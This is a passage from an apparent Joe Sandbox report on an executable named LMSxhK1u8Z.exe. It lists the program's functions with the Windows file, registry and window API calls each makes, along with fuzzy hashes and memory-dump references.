                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                                                                • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                                                                Function 004031A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                  • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004031CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 4115351271-517883005
                                                                                                • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                                • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                                                                • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                                • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                                                                Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                                                                • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                                                                • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                                                                • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                                                                Function 00401F08 Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1691843260-0
                                                                                                • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                                                • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                                                                • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                                                • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                                                • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                                                Function 004050CD Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 004050DD
                                                                                                  • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 2896919175-0
                                                                                                • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                                                • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                                                                • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                                                • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                                                                Function 004059CF Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                                                • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                                                Function 004059AA Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                                                                • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                                                                Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                • String ID:
                                                                                                • API String ID: 390214022-0
                                                                                                • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                                • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                                                                • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                                • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                                                                Function 00403160 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                                • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                                                                • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                                • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                                                                Function 00402BDA Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
